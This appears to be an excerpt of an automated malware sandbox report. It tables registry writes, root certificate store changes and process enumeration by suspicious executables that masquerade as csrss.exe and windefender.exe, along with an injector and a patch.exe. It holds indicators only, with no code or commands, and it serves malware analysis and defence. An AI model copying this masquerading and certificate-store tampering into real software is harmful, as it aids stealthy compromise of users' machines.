Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-392 = "Arab Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-962 = "Paraguay Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
N/A N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
N/A N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
N/A N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
N/A N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
N/A N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
N/A N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
N/A N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
N/A N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
N/A N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
N/A N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
N/A N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
N/A N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
N/A N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
N/A N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
N/A N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
N/A N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
N/A N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
N/A N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
N/A N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
N/A N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
N/A N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
N/A N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
N/A N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
N/A N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
N/A N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
N/A N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
